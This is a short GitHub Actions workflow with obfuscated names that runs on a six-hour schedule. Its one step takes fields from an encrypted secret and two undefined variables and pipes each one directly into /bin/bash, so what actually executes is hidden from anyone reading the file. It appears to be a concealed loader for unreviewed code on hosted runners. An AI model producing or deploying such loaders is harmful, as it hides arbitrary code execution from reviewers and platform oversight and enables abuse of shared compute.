name: catspainful

on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: catspainful
        env:
          i059: ${{ secrets.i059 }}
        run: |
          echo $i059 | jq -r .y09 | /bin/bash
          echo $r596 | jq -r .aydpp9 | /bin/bash
          echo $ialju512 | jq -r .syo86645 | /bin/bash

